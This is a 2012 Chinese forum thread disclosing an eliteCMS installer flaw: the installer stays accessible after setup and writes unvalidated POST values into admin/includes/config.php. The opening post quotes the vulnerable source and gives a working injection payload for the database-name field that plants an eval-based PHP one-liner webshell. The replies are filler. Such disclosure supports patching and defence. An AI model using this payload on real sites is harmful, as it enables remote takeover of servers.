查看: 1648|回复: 25

eliteCMS安装文件未验证 + 一句话写入安全漏洞

[复制链接]
发表于 2012-11-26 05:58:06 | 显示全部楼层 |阅读模式
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
我们来看代码:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...略...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

在看代码:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

取值未作任何验证
如果将数据库名POST数据:

"?><?php eval($_POST[c]);?><?php

将导致一句话后门写入/admin/includes/config.php
发表于 2012-11-29 16:18:33 | 显示全部楼层
加油啊!!!!顶哦!!!!!  
发表于 2012-12-3 08:10:03 | 显示全部楼层
呵呵,明白了  
发表于 2012-12-5 21:10:15 | 显示全部楼层
今天再看下  
发表于 2012-12-9 20:54:50 | 显示全部楼层
今天没事来逛逛,看了一下,感觉相当的不错。  
发表于 2012-12-10 20:59:28 | 显示全部楼层
希望大家都有好运  
发表于 2014-10-3 10:52:55 | 显示全部楼层
初来乍到,请多多关照。。。  
发表于 2014-10-17 04:16:35 | 显示全部楼层
朕要休息了..............  
发表于 2015-1-26 09:54:41 | 显示全部楼层
@,@..是什么意思呀?  
发表于 2015-2-28 11:46:39 | 显示全部楼层
不错不错,我喜欢看  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则